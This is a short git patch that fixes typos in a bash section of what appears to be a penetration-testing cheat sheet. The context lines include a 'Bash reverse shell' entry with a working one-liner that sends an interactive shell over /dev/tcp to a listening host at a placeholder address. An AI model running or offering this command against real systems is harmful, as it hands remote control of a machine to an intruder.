From c71945966fd8339363da60807ac2e34f6a8237b1 Mon Sep 17 00:00:00 2001 From: David Busby Date: Fri, 6 Jun 2014 16:27:11 +0100 Subject: [PATCH] typo correction --- scripting/bash.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scripting/bash.md b/scripting/bash.md index 3a54e14..21b0e41 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -114,7 +114,8 @@ cat /proc/cpuinfo ``` **Bash reverse shell** (@icleus) -Works on all distrobutions where egress filtering is not in place / quiet open, use this to reverse connect to your lsitening host. + +Works on all (recent) distrobutions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. ```bash bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &